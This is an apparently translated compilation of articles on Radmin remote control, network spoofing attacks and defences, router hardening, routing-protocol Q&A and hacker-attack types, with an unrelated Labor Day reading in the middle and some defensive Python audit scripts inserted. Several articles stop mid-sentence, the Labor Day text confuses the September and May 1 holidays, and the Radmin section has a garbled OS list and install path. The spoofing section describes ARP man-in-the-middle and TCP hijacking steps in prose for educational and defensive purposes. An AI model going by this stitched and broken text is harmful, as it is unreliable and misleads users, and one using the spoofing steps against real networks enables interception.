Radmin 3.4 fully supports Windows 7 32-bit and 64-bit, including User Account Control and Fast User Switching. Radmin Server 3.4 supports Windows 7/Vista/XP///2000 (32-bit) and Windows 7/Vista/XP/2008/2003 (64-bit); Radmin Viewer 3.4 supports Windows 7/Vista/XP/2008/2003/2000/ME/98/95/NT4.0 (32-bit) and Windows 7/Vista/XP/2008/2003 (64-bit).
5. Simple operation, multiple connections
Radmin supports running the controlled end as a service, multiple connections and IP filtering (allowing only specific IPs to control the remote machine), personalised file transfer, remote shutdown, high-resolution modes, Windows NT-based security and password protection, and log file support. Radmin currently supports TCP/IP and is very widely used.
(2) Software components
Radmin consists of two parts, the server (Radmin Server) and the viewer (Radmin Viewer). In early versions the two were integrated; from 3.0 on they are separate. The viewer (Radmin Viewer) is Radmin.exe; the server (Radmin Server) is the earlier R_server.exe part, which gained new functions in later versions and was renamed, the server's main program changing from R_server.exe to rserver3.exe. Its install path changed from "C:\Program Files\Radmin" to "C:\WINDOWS\system32server30", with 25 main program files.
Article 4: A Summary of Network Protocol Spoofing Attacks and Defences
In the virtual environment of the network, as in reality, there are all kinds of people, and all kinds of spoofing techniques are rampant. The author recently had some spare time and summarised the common spoofing techniques and the ways to guard against them, hoping it helps readers.
I. ARP spoofing
The ARP protocol converts IP addresses to MAC addresses; the mapping is stored in the ARP cache table. If the ARP cache is illegally modified, packets meant for the correct host are sent instead to another host controlled by the attacker. ARP spoofing, also called ARP poisoning, achieves exactly this.
Suppose the attacker and the target host are on the same LAN, and the attacker wants to intercept and eavesdrop on all traffic between the target host and the gateway. On a hub-based LAN the attacker only needs to put the network card into promiscuous mode. But today's LANs use switches, which increase both capacity and security. In this case the attacker first probes whether the switch has a fail-safe mode, a special operating state of the switch. Maintaining the mapping between IP addresses and MAC addresses costs the switch some processing power; when a large number of bogus MAC addresses appear on the network, some types of switch become overloaded and fall into fail-safe mode. If the switch has no fail-safe mode, ARP spoofing is required.
The attacker's host needs two network cards, with IP addresses 192.168.0.5 and 192.168.0.6, plugged into two switch ports, ready to intercept and eavesdrop on all communication between the target host 192.168.0.3 and the router 192.168.0.1. The attacker's host also needs IP packet forwarding, which on Linux only requires the command echo 1 > /proc/sys/net/ipv4/ip_forward. Taking the communication of 192.168.0.4 as an example, normal ARP resolution goes like this:
1. Host A, 192.168.0.4, wants to communicate with the router 192.168.0.1 to reach the Internet.
2. Host A broadcasts an ARP request, hoping to obtain the router's MAC address.
3. The switch receives the ARP request and forwards it to every host connected to it. At the same time it updates its MAC-address-to-port table, binding 192.168.0.4 to the port it is connected to.
4. On receiving A's ARP request, the router sends an ARP reply carrying its own MAC address.
5. The router updates its ARP cache, binding A's IP address and MAC address.
6. When the switch receives the router's ARP reply to A, it looks up its MAC-address-to-port table and sends the reply to the corresponding port. It also updates that table, binding 192.168.0.1 to the port it is connected to.
7. Host A receives the ARP reply and updates its ARP cache, binding the router's IP address and MAC address.
8. Host A uses the updated MAC address to send data to the router, and the communication channel is established.
ARP spoofing requires the attacker to quickly trick both the target host 192.168.0.3 and the router 192.168.0.1 into communicating with it, making itself the man in the middle (MiM). In other words, the attacker's host becomes a router completely under the attacker's control; all data between the target host and the router is forwarded by the attacker's host, and the attacker can process the data in any way. To deceive the target host and the router at the same time, the attacker opens two command windows and performs ARP spoofing twice: one run makes the target host believe the attacker's host has the router's MAC address, using IP spoofing to forge the router's IP address and sending ARP request packets from one of the attacker's network cards to the target host, so that the false MAC-to-IP mapping is written into the target host; the other run makes the router believe the attacker's host has the target host's MAC address, in a similar way.
Guarding against ARP spoofing:
On an infected network, ARP virus packets are sent constantly, misleading your machine's resolution of the gateway's MAC address. So the MAC address needs to be bound. Two methods:
1. List the MAC addresses of all machines on the LA     N.
# arp
Address HWtype HWaddress Flags Mask Iface
192.168.1.1 ether 00:07:E9:2A:6F:C6
Then bind the MAC address:
# arp -s 192.168.1.1 00:07:E9:2A:6F:C6
Note: if the user's gateway has a hostname set, 192.168.1.1 here may need to be replaced with the hostname.
2. Create an /etc/ethers file. For example, to bind the gateway, write in /etc/ethers: 192.168.1.1 00:07:E9:2A:6F:C6, then run # arp -f. The MAC address must be re-bound after every reboot.
In addition, MAC binding must be bidirectional: if machine A binds machine B, machine B must also bind machine A; only then is the ARP virus completely blocked.
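Static binding as described above only helps if someone notices when the live ARP table disagrees with it. As an added example (not from the article), this audit compares an `arp -n` table against a trusted /etc/ethers-style mapping and reports the two symptoms of poisoning: a trusted host whose MAC has changed, and one MAC answering for several IPs. It also emits the `arp -s` bindings the article recommends. The table and mapping are constructed; ethers(5) writes "MAC host" while the article writes "IP MAC", so both orders are accepted.

```python
import re
from collections import defaultdict

# Constructed `arp -n` output (not from the page): the gateway's MAC has changed, and the same MAC
# now answers for two IPs, the classic symptom of ARP poisoning.
ARP_OUTPUT = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   00:16:3e:aa:bb:cc   C                     eth0
192.168.1.20             ether   00:0c:29:12:34:56   C                     eth0
192.168.1.30             ether   00:16:3e:aa:bb:cc   C                     eth0
"""

# Constructed trusted mapping; both "MAC host" (ethers(5)) and "host MAC" (the article's form) are accepted.
TRUSTED_ETHERS = """\
# gateway
00:07:E9:2A:6F:C6 192.168.1.1
192.168.1.20 00:0c:29:12:34:56
"""

MAC_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")


def parse_arp_table(text):
    """Map IP -> MAC from `arp -n` output; the header line and incomplete entries are skipped."""
    live = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 3 and MAC_RE.match(fields[2]):
            live[fields[0]] = fields[2].lower()
    return live


def parse_ethers(text):
    """Map host -> MAC from an ethers-style file, whichever column order is used."""
    trusted = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        a, b = line.split()[:2]
        mac, host = (a, b) if MAC_RE.match(a) else (b, a)
        trusted[host] = mac.lower()
    return trusted


def audit_arp(live, trusted):
    """Findings: trusted hosts missing or with a changed MAC, then MACs claimed by more than one IP."""
    findings = []
    for ip, mac in sorted(trusted.items()):
        seen = live.get(ip)
        if seen is None:
            findings.append({"kind": "missing", "ip": ip, "expected": mac, "seen": None})
        elif seen != mac:
            findings.append({"kind": "mismatch", "ip": ip, "expected": mac, "seen": seen})
    by_mac = defaultdict(list)
    for ip, mac in live.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append({"kind": "duplicate", "mac": mac, "ips": sorted(ips)})
    return findings


def repin_commands(trusted):
    """The static bindings the article recommends, one `arp -s` per trusted host."""
    return [f"arp -s {ip} {mac}" for ip, mac in sorted(trusted.items())]
```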
II. IP address spoofing
IP address spoofing is the attacker sending packets under someone else's IP address. Because the IP protocol does not authenticate the IP addresses in a packet, anyone can forge the source address of an IP packet without authorisation.
Once an IP packet has been sent into the network, the source IP address is hardly used; it comes into play only when an intermediate router drops the packet for some reason or when the packet reaches its destination. This lets a host send IP packets carrying another host's IP address, as long as it can put such packets onto the network.
Therefore, if the attacker disguises its host as a friendly host trusted by the target, i.e. changes the source IP address of the packets it sends to that of the trusted friendly host, it can attack the trusting host by exploiting the trust relationship between hosts and the weakness in how that trust is actually verified (by IP address only). Note that the trust relationship here means an authorised host can conveniently access the trusting host. For example, all the R* commands in Unix use the trusted-host scheme, so an attacking host that changes its IP to the trusted host's IP can connect to the trusting host and use the R* commands to open a back door and accomplish the attack.
Two issues must be noted to carry out IP address spoofing:
1. Because the remote host sends its replies only to the forged IP address, the attacker cannot receive the remote host's output: if host C impersonates host B's IP to connect to remote host A, A sends its replies only to B and C cannot receive them;
2. To establish a connection between attacker and victim, the attacker needs the correct TCP sequence numbers.
Attackers use IP address spoofing mainly for two purposes:
1. Simply to hide their own IP address, or to forge abnormal packets whose source and destination IP are the same, without caring whether the target's reply is received, e.g. IP fragments and the Land attack;
2. To obtain unauthorised services by posing as a friendly host trusted by the target. Solution: the ideal method at present is a firewall, which decides whether to let external IP packets into the LAN and inspects IP packets coming from outside. If a packet from outside claims an internal address, it must be a spoofed packet. If a packet's IP address does not belong to any subnet inside the firewall, it must not leave the firewall.
III. Routing spoofing
In a TCP/IP network, the path of an IP packet is entirely decided by routing tables. If the attacker changes the routing tables by some means so that packets sent by the target host reach a host or router the attacker controls, eavesdropping, tampering and other attacks become possible.
1. RIP routing spoofing
RIP propagates routing information within an autonomous system. Routers generally do not check RIP datagrams on receipt. An attacker can claim that router A, which he controls, is the fastest way to reach some site B, luring packets for B to be relayed through A. Since A is under the attacker's control, the attacker can eavesdrop on and tamper with the data.
The main defence against RIP spoofing: a router should verify that a new route is reachable before accepting it, which greatly reduces the probability of this attack. But some RIP implementations do no verification, so false routing information can spread widely. Because routing information is visible on the network, the wider the false information spreads, the more likely it is to be noticed. So for system administrators, checking log files regularly helps discover such problems.
2. IP source-route spoofing
The options field of the IP header includes "source routing", which can specify the route to the destination. Normally, if the destination host has a reply or other information to return to the source, it can simply use that route in reverse as the reply path.
Host A (say IP address 192.168.100.11) is a host trusted by host B (say IP address 192.168.100.1), and host X wants to impersonate A to obtain services from B. First the attacker modifies router G2, the router closest to X, so that packets reaching that router with destination address 192.168.100.1 are directed towards the network X is on; then attacker X uses IP spoofing (changing the packet's source address to 192.168.100.11) to send B packets carrying the source-route option (specifying the nearest router G2). When B replies, it reverses the source route it received, sending the reply to the modified router G2. Because G2's routing table has been altered, on receiving B's packet G2 sends it to X's network, where X can conveniently sniff and collect it.
Good ways to guard against IP source-route spoofing are:
1. Configure routers to discard packets arriving from the external network that claim to come from internal hosts;
2. Disable source routing on hosts and routers.
IV. TCP spoofing
There are two ways to carry out a TCP spoofing attack:
1. Non-blind attack
The attacker and the spoofed destination host are on the same network, so the attacker can simply capture TCP segments with a protocol analyser (sniffer) and obtain the needed sequence numbers. The attack steps are:
(1) Attacker X makes sure that host B, trusted by target host A, is not operating; if it is, X uses SYN flooding or another attack to put it into a denial-of-service state.
(2) Attacker X forges a packet B->A: SYN (ISN C), with B as the source IP address and initial sequence number C, sending a TCP SYN to the target host to request a connection.
(3) The target host replies A->B: SYN (ISN S), ACK (ISN C), with initial sequence number S and acknowledgement number C. Because B is in a denial-of-service state it sends no response. Attacker X captures the TCP segment with a sniffer and obtains the initial sequence number S.
(4) Attacker X forges a packet B->A: ACK (ISN S), completing the three-way handshake and establishing the TCP connection.
(5) Attacker X keeps communicating with A using B's IP address.
2. Blind attack
Because the attacker and the spoofed target host are not on the same network, the attacker cannot capture TCP segments with a sniffer. The steps are almost the same as for the non-blind attack, except that in step (3) the sniffer cannot be used and TCP initial sequence number prediction is used to obtain the ISN instead. In step (5), attacker X can send the first packet but cannot receive A's response, so interaction is hard to achieve.
From the attacker's point of view the blind attack is harder, because the destination host's responses are all sent to the unreachable spoofed host, so the attacker cannot directly determine success or failure. However, the attacker can use routing spoofing
Article 5: English Material on May Day (Labour Day)
Labor Day, the first Monday in September, is a creation of the labor movement and is dedicated to the social and economic achievements of American workers. It constitutes a yearly national tribute to the contributions workers have made to the strength, prosperity, and well-being of our country.
Founder of Labor Day
More than 100 years after the first Labor Day observance, there is still some doubt as to who first proposed the holiday for workers.
Some records show that Peter J. McGuire, general secretary of the Brotherhood of Carpenters and Joiners and a cofounder of the American Federation of Labor, was first in suggesting a day to honor those “who from rude nature have delved and carved all the grandeur we behold.”
But Peter McGuire's place in Labor Day history has not gone unchallenged. Many believe that Matthew Maguire, a machinist, not Peter McGuire, founded the holiday. Recent research seems to support the contention that Matthew Maguire, later the secretary of Local 344 of the International Association of Machinists in Paterson, N.J., proposed the holiday in 1882 while serving as secretary of the Central Labor Union in New York. What is clear is that the Central Labor Union adopted a Labor Day proposal and appointed a committee to plan a demonstration and picnic.
The first Labor Day holiday was celebrated on Tuesday, September 5, 1882, in New York City, in accordance with the plans of the Central Labor Union. The Central Labor Union held its second Labor Day holiday just a year later, on September 5,1883.
In 1884 the first Monday in September was selected as the holiday, as originally proposed, and the Central Labor Union urged similar organizations in other cities to follow the example of New York and celebrate a "workingmen's holiday" on that date. The idea spread with the growth of labor organizations, and in 1885 Labor Day was celebrated in many industrial centers of the country.
Labor’s Day is on May 1st. Labor’s Day is an international day for workers. Working is glorious, and we should respect workers. The Labor’s Day is workers’ holiday and workers can enjoy themselves to their heart’s content. Many people choose to travel. And some others will go to the cinema. Some will go to parks. And others will stay at home.
Article 6: Analysis and Practice of Network Routing Security Attack and Defence Countermeasures
The security of network routers has always been much discussed, yet we see few router intrusion incidents, so many people think of routing only as choosing the path along which information travels across the internetwork from source node to destination node. In fact routers have many security weaknesses; it is only because ordinary hackers rarely touch them that attacks are rare, but if a router is attacked the consequences are unthinkable.
Router security must not be overlooked
The router is one of the most important devices on the Internet; it is the tens of thousands of routers around the world that form the "bridges" of this giant information network running day and night around us. On the Internet the router acts as a "relay station" forwarding packets. For a hacker, launching an attack through a router vulnerability is usually fairly easy: attacking a router wastes CPU cycles, misdirects traffic and can paralyse the network. A good router usually has a good built-in security mechanism to protect itself, but that alone is far from enough; protecting a router also requires the administrator to take security measures while configuring and managing it.
Most popular routers exist as hardware devices, but in some cases a program implements a "software router"; the only difference between the two is execution efficiency. A router normally connects to at least two networks and decides each packet's path according to the state of the networks it connects. The router builds and maintains a table called the "routing information table", which tracks the addresses and status of neighbouring routers.
Using the routing table and optimisation algorithms based on distance and communication cost, the router decides the best path for a given packet. This is what gives the router its "intelligence": it automatically selects and adjusts packet forwarding according to the real operating state of neighbouring networks, doing its best to deliver packets along the optimal route at the least cost. Whether routers run safely and stably directly affects Internet activity; whatever the cause, a router crash, denial of service or sharp drop in efficiency is disastrous.
Anatomy of router security
Router security has two aspects: the security of the router itself and the security of data. Because routers are the core of the Internet and the key devices interconnecting networks, their security requirements are higher than for other devices: a host vulnerability at worst makes that host inaccessible, whereas a router vulnerability can make the whole network inaccessible.
Router vulnerabilities may have managerial and technical causes. Managerially, poor router password choices, inappropriate use of routing-protocol authorisation mechanisms and mistaken routing configuration can all cause router problems; technically, vulnerabilities may be exploited by malicious attacks such as eavesdropping, traffic analysis, impersonation, replay, denial of service, unauthorised resource access, interference and viruses. There are also software weaknesses: back doors, operating system flaws, database flaws, TCP/IP protocol flaws, network services and so on may all contain vulnerabilities.
So that routers forward legitimate information completely, promptly and securely to its destination, many router vendors have begun adding security modules: firewall, VPN, IDS, antivirus, URL filtering and other technologies are built into routers, producing a trend of convergence between routers and security devices. Essentially a router with added security modules is no different from an ordinary router in its routing function; the difference is that it can strengthen packet security through encryption and authentication and cooperate effectively with dedicated security devices, improving the security of the router itself and the availability of the segments it manages.
To protect the router we must also consider how it is configured. Generally a router can be configured through the console terminal or telnet; the configuration can be downloaded from a TFTP server; and a network management workstation can also be used. The greatest threat from router attacks is that the network becomes unusable, and such attacks require mobilising many servers close to the backbone. In fact a router has an operating system, which is also software, and compared with other operating systems the technical gap is obvious: its functions are single-purpose, compatibility and usability are not considered, the core is fixed, administrators generally do not allow remote logins, and few people understand routers, so its security problems are not very visible; when it occasionally hangs, the administrator usually runs the reboot command and everything is fine again.
For this very reason, many router administrators do not care much about it as long as the network works, because routers are usually maintained by the vendor. Some vendors even like to add: "If you forget the password, contact your dealer." In fact even Unix has many vulnerabilities, let alone a router's fragile operating system. Of course a router generally cannot be penetrated, because you cannot log in remotely; administrators normally do not enable it. But there are many vulnerabilities that cause routers to deny service. And many administrators have a bad habit: they patch Windows diligently but cannot be bothered to patch the router's operating system.
Five categories of router security control technology
Access control technology: user authentication is the basic technology for user security protection. A router can use several user access control mechanisms, such as PPP, web login authentication, ACLs and 802.1x, to protect access users from network attacks and to stop access users attacking other users and the network. Security authentication based on the CA standard system further strengthens access control.
Transmission encryption technology: IPsec is a protocol commonly used on routers; with it routers support building virtual private networks (VPNs). IPsec includes ESP (Encapsulating Security Payload), AH (Authentication Header) and IKE, the key management protocol, and can be used on public IP networks to ensure the reliability and integrity of data communication so that data crosses the public network without being eavesdropped. IPsec is easy to deploy: only the routers or hosts at the two ends of the secure channel need to support it, with almost no change to the existing network infrastructure, which is the main reason IPsec can secure many applications including remote login, client/server, e-mail, file transfer and web access.
Firewall protection technology: routers with a firewall module can filter and inspect all received and forwarded packets, and the inspection policy can be changed and managed through configuration. Routers can also hide the internal topology with NAT/PAT and implement more complex application-layer gateway (ALG) functions, and some routers offer content-based protection. The principle is that when a packet passes through the router, the firewall module compares it with the specified access rules; if the rules allow, the packet is inspected, otherwise it is dropped. If the packet opens a new control or data connection, the module dynamically modifies or creates rules and updates the state table to allow packets belonging to the new connection; returning packets are allowed through only if they belong to an existing valid connection.
Intrusion detection technology: intrusion detection (IDS) is a very important technology in the security architecture. Some routers and high-end switches already have built-in IDS modules; a built-in IDS module requires the router to have complete port mirroring (one-to-one, many-to-one) and packet statistics support.
HA (high availability): to improve its own security, the router should support backup protocols (such as VRRP) and have log management, giving network data greater redundancy and assurance.
Router intrusion methods and countermeasures
Generally speaking, the means hackers use to attack routers are much the same as those used against other computers on the network, because strictly speaking a router is itself a computer with a special mission, even though it may not look like the familiar PC. Hacker attacks on routers fall into two types: obtaining administrative privileges by some means and intruding directly into the system; or using remote attacks to crash the router or sharply reduce its efficiency. The former is harder.
In the first type of intrusion, the hacker usually exploits user carelessness or known system defects (such as "bugs" in the system software) to gain access, then through a series of further actions eventually obtains super-administrator privileges. A hacker rarely gains control of the whole system at the outset; it is usually an escalating process. Because a router does not have many user accounts like an ordinary system and often runs relatively secure special-purpose software, gaining administrative control of a router is much harder than intruding into an ordinary host.
Therefore most existing hacker attacks on routers belong to the second category. Their final goal is not to enter the system but to send attack packets, or a huge number of "junk" packets within a certain interval, to consume the router's resources so that it cannot work properly or even crashes completely.
The router is the communication exit between the internal network and the outside world; in a network it balances bandwidth and translates IP addresses, letting many internal computers share a small number of external IP addresses to reach the outside. Once a hacker takes the router, he controls the internal network's access to the outside, and if the router is hit by a denial-of-service attack, the internal network cannot reach the outside and the network may even collapse. Specifically, we can implement the following countermeasures:
To prevent external ICMP redirect spoofing: attackers sometimes use ICMP redirects against the router, redirecting information meant for the correct destination to a device they specify in order to obtain useful information. The commands to forbid external users from using ICMP redirects are: interface serial0 / no ip redirects.
To prevent external source-route spoofing: source routing uses data-link-layer information to route datagrams. This bypasses the network layer's routing information, so an intruder can specify an illegal route for datagrams into the internal network, and datagrams that should go to their legitimate destination are sent to the address the intruder specifies. The command to disable source routing is: no ip source-route.
How to prevent theft of internal IP addresses? Because attackers may steal an internal IP address for unauthorised access, the Cisco router's arp command can bind a fixed IP address to a MAC address. The command is: arp <fixed IP address> <MAC address> arpa.
To stop Smurf at the source site, the key is to block all inbound echo requests, which means preventing the router from mapping traffic directed at the network broadcast address onto the LAN broadcast address. Enter in LAN interface mode: no ip directed-broadcast.
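The four hardening commands above are easy to forget on one interface. As an added example (not from the article), this audit reads an IOS running-config and reports each interface that lacks `no ip redirects` or `no ip directed-broadcast`, whether `no ip source-route` is missing globally, and which static `arp ... arpa` bindings are present. The config is constructed; because only explicit lines are checked, a release that hides a secure default in the running-config is flagged conservatively.

```python
# Constructed IOS running-config excerpt (not from the page): Serial0 still accepts ICMP redirects and
# directed broadcasts, and source routing is left enabled globally.
SAMPLE_CONFIG = """\
!
hostname edge-rtr
ip source-route
!
interface Serial0
 ip address 203.0.113.1 255.255.255.252
!
interface FastEthernet0
 ip address 192.168.10.1 255.255.255.0
 no ip redirects
 no ip directed-broadcast
!
arp 192.168.10.50 0000.0c12.3456 arpa
!
"""

INTERFACE_CHECKS = {
    "ip redirects": "no ip redirects",                    # ICMP redirect spoofing
    "ip directed-broadcast": "no ip directed-broadcast",  # Smurf amplification
}
GLOBAL_CHECKS = {"ip source-route": "no ip source-route"}  # source-route spoofing


def parse_config(cfg):
    """Split an IOS config into global lines and per-interface lines (indented under `interface`)."""
    global_lines, interfaces, current = [], {}, None
    for raw in cfg.splitlines():
        if raw.startswith("interface "):
            current = raw.split(None, 1)[1].strip()
            interfaces[current] = []
        elif raw.startswith(" ") and current is not None:
            interfaces[current].append(raw.strip())
        else:
            current = None
            if raw.strip() and not raw.startswith("!"):
                global_lines.append(raw.strip())
    return global_lines, interfaces


def audit_config(cfg):
    """Return hardening gaps as (scope, weakness, fix) and the static ARP bindings already present.
    Only explicit `no ...` lines count, so a hidden secure default is flagged rather than assumed."""
    global_lines, interfaces = parse_config(cfg)
    gaps = []
    for weakness, fix in GLOBAL_CHECKS.items():
        if fix not in global_lines:
            gaps.append(("global", weakness, fix))
    for name, lines in interfaces.items():
        for weakness, fix in INTERFACE_CHECKS.items():
            if fix not in lines:
                gaps.append((name, weakness, fix))
    static_arp = [line for line in global_lines if line.startswith("arp ")]
    return {"gaps": gaps, "static_arp": static_arp}
```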
Article 7: Top-Secret Materials for Network Engineers
Router questions:
1. When are multiple routing protocols used?
Multiple routing protocols are needed when two different routing protocols must exchange routing information; of course route redistribution can also exchange routing information. The following situations do not require multiple routing protocols:
Upgrading from an old version of an Interior Gateway Protocol (IGP) to a new version of the IGP.
You want to use another routing protocol but must keep the original one.
You want to terminate internal routing to avoid interference from other routers that lack strict filtering and supervision.
You are in an environment made up of routers from multiple vendors.
What is a distance-vector routing protocol?
Distance-vector routing protocols are designed for small network environments. In large networks they generate considerable traffic and consume too much bandwidth while learning and maintaining routes. Only if no routing table update is received from a neighbour within 90 seconds is the neighbour considered unreachable. Every 30 seconds a distance-vector protocol sends its entire routing table to neighbours so that their tables are updated. In this way it collects a list of networks from other stations (directly connected or otherwise) for route selection. Distance-vector protocols use hop count as the metric, counting the routers that must be crossed to reach the destination.
For example, RIP uses the Bellman-Ford algorithm to determine the shortest path, i.e. the route with the fewest hops to the destination. The maximum allowed hop count is usually set to 15; destinations that require crossing more than 15 routers are considered unreachable.
Distance-vector routing protocols include: IP RIP, IPX RIP, AppleTalk RTMP and IGRP.
What is a link-state routing protocol?
Link-state routing protocols suit large networks better, but their complexity demands more CPU on the router. They discover broken links or newly connected routers faster, so their convergence time is shorter than that of distance-vector protocols. Usually a neighbour is considered unreachable if no HELLO packet is received from it within 10 seconds. A link-state router sends update packets to its neighbours announcing all the links it knows. Its metric for the best path is a numeric cost, generally determined by link bandwidth; the link with the lowest cost is best. In the shortest-path-first algorithm the maximum possible cost is almost unlimited.
If the network does not change, the router only needs to refresh the unchanged routing table periodically (the period can range from 30 minutes to 2 hours).
Link-state routing protocols include: IP OSPF, IPX NLSP and IS-IS.
Can a router use both a distance-vector and a link-state routing protocol?
Yes. Each interface can be configured with a different routing protocol, but they must be able to exchange routing information through route redistribution. (Route redistribution is discussed later in this chapter.)
2. What is an access list?
An access list is a series of rules added by the administrator to control packets entering and leaving the router; it is not generated by the router itself. An access list can permit or deny packets entering or leaving for a destination. Entries are processed in order: when a packet arrives, it is first checked against the first entry; if that does not apply, the following entries are checked in turn; if it matches the first entry, whether permitted or denied, no further entries are checked.
Each protocol on each interface can have only one access list.
Which types of access list are supported?
An access list is identified by its number. The protocols and their access-list number ranges are:
◎ IP standard access lists: 1 to 99
◎ IP extended access lists: 100 to 199
◎ IPX standard access lists: 800 to 899
◎ IPX extended access lists: 1000 to 1099
◎ AppleTalk access lists: 600 to 699
Note: in Cisco IOS Release 11.2 or later, named access lists can be used for access lists numbered 1 to 199.
How do you create an IP standard access list?
An IP standard access list is created with the following command: access-list access-list-number {permit | deny} source [source-mask]
In this command:
◎ access-list-number: identifies which access list the entry belongs to; a number from 1 to 99.
◎ permit | deny: whether the entry permits or blocks traffic from the specified address.
◎ source: the source IP address.
◎ source-mask: which bits of the address are used for matching. A bit of "1" means that address bit is ignored; a bit of "0" means that address bit is used for matching. Wildcards can be used.
Here is an access-list example from a router configuration file:
Router# show access-lists
Standard IP access list 1
deny 204.59.144.0, wildcard bits 0.0.0.255
permit any
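The wildcard rule above (a 1 bit is ignored, a 0 bit must match) and first-match ordering decide what the list does, and the implicit deny at the end is easy to overlook. As an added example (not from the article), this evaluator parses standard `access-list` entries, including `any` and `host`, and evaluates source addresses against a numbered list. The entries are constructed; the first two reproduce the rule shown above.

```python
import ipaddress

# Constructed ACL in `access-list` command form; entries for list 1 match the `show access-lists` output above.
SAMPLE_ACL = [
    "access-list 1 deny 204.59.144.0 0.0.0.255",
    "access-list 1 permit any",
    "access-list 2 permit host 10.1.1.1",
]


def ip_to_int(text):
    return int(ipaddress.IPv4Address(text))


def parse_standard_acl(lines):
    """Parse standard IP access-list entries into (number, action, address, wildcard) tuples, in order."""
    rules = []
    for raw in lines:
        parts = raw.split()
        if len(parts) < 4 or parts[0] != "access-list":
            continue
        number, action, source = int(parts[1]), parts[2], parts[3]
        if not 1 <= number <= 99:
            raise ValueError(f"{number} is not a standard IP access-list number (1-99)")
        if action not in ("permit", "deny"):
            raise ValueError(f"unknown action {action!r}")
        if source == "any":
            address, wildcard = 0, 0xFFFFFFFF
        elif source == "host":
            address, wildcard = ip_to_int(parts[4]), 0
        else:
            address = ip_to_int(source)
            wildcard = ip_to_int(parts[4]) if len(parts) > 4 else 0  # omitted mask means exact host
        rules.append((number, action, address, wildcard))
    return rules


def wildcard_match(address, wildcard, ip):
    """A 1 bit in the wildcard is 'don't care'; 0 bits must match."""
    care = ~wildcard & 0xFFFFFFFF
    return address & care == ip & care


def evaluate(rules, number, ip_text):
    """First matching entry wins; a list with no matching entry ends in the implicit deny."""
    ip = ip_to_int(ip_text)
    for n, action, address, wildcard in rules:
        if n == number and wildcard_match(address, wildcard, ip):
            return action
    return "deny"
```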
3. When is route redistribution used?
Route redistribution is usually configured on routers responsible for learning routes from one autonomous system and advertising them into another. If you are using IGRP or EIGRP, redistribution is usually performed automatically.
4. What is administrative distance?
Administrative distance is the trustworthiness of a routing protocol's routes. Each routing protocol is assigned a trust level, from most to least reliable; this trust level is the administrative distance. For routes to the same destination from two different routing protocols, the router first uses administrative distance to decide which protocol to believe.
5. How do you configure redistribution?
Before redistributing routes you must first:
1) Decide where to add the new protocol.
2) Identify the autonomous system boundary router (ASBR).
3) Decide which protocol is in the core and which at the edge.
4) Decide the direction of redistribution.
Routing updates can be redistributed with the following command (this example is for OSPF):
router(config-router)#redistribute protocol [process-id] [metric metric-value] [metric-type type-value] [subnets]
In this command:
◎ protocol: the source routing protocol whose routes are to be redistributed. The main values are: bgp, egp, igrp, isis, ospf, static [ip], connected and rip.
◎ process-id: the OSPF process ID.
◎ metric: an optional parameter giving the metric of the redistributed routes. The default metric is 0.
6. Why is identifying neighbouring routers important?
In a small network identifying neighbouring routers is not a major issue, because when a router fails the others converge in an acceptable time. In a large network the delay in discovering a failed router can be large. Knowing the neighbours speeds up convergence, because routers learn of a failed router sooner: the hello interval is shorter than the interval at which routers exchange routing information.
A router using a distance-vector protocol discovers that a neighbour is unreachable only when the neighbour fails to send routing updates, typically after 10 to 90 seconds. A router using a link-state protocol discovers an unreachable neighbour when no hello packet is received, typically after 10 seconds.
How do distance-vector and link-state routing protocols discover neighbours?
A router using a distance-vector protocol builds a routing table (including the networks directly connected to it) and sends it to the routers directly connected to it. The neighbour merges the received table into its own and in turn sends its table to its neighbours. A router using a link-state protocol builds a link-state table listing the destinations of the entire network. In its update packets each router sends its entire list. When a neighbour receives the update it copies the contents and forwards the information to its neighbours. No recalculation is needed when forwarding routing-table contents.
Note: routers using IGRP and EIGRP broadcast hello packets to discover neighbours and, like OSPF, exchange routing updates. EIGRP, for each type of
Article 8: A Paper on Computer Network Hackers and Network Attack and Defence Technology
[Abstract] People now rely more and more on computer network technology, whose application brings many conveniences to life and work; but because of many factors there are security risks in its application, among which hacker attacks are a prominent threat. This paper describes hacker attacks on computer networks and explores in detail the application of computer network security protection technology.
[Keywords] computer network; hacker attack; protection technology
Introduction
With the rapid development and wide application of network technology, network security problems have become increasingly prominent, and the forms and activities of hacker attacks show a trend towards diversification, so the application of protection technology against hacker attacks on networks has become critical. Deepening the theoretical study of hacker attack and defence technology can offer some guidance for solving real hacker attack problems.
I. Analysis of hacker attacks on computer networks
In the use of computer networks, hacker attacks are a prominent problem; as hackers' technical level rises, attack methods have diversified. The main forms of network attack are the following. First, denial-of-service attacks. Among hacker attack methods, denial of service is common; its aim is not to obtain information but to block a service on a host so that users cannot use the network normally. It mostly exploits system vulnerabilities; once the system's limited resources are exhausted it can no longer provide normal service [1]. Denial-of-service methods are also diversifying, for example distributed denial-of-service attacks, which directly affect users' normal use of the network. Second, eavesdropping attacks. Hackers attack by network eavesdropping, also one of the common methods. Eavesdropping mainly listens to the computer system and to network packets to obtain information; it does not damage the system, but it is the preparation for an attack: after obtaining the desired information, such as accounts and passwords, the network attack is launched to achieve illegal ends. Third, malicious code attacks. In the use of computer networks, malicious program code does serious damage to the system [2]. Hackers using this method install malicious code into the system through external devices and the network, mainly by means of viruses and back-door programs; the stronger a virus's ability to replicate, the greater the damage. After a virus is installed it damages the system and infects other systems, achieving the goal of destroying the system. Back-door programs are installed after an intrusion to make the next intrusion convenient. Fourth, vulnerability attacks. These are also common, because programs have flaws in design, implementation and operation; hackers exploit them to obtain user or even administrator privileges, or to damage the system. Buffer overflow is a common implementation error, and hackers exploit such flaws to break into systems and obtain the information they want.
II. Application of protection technology against hacker attacks on computer networks
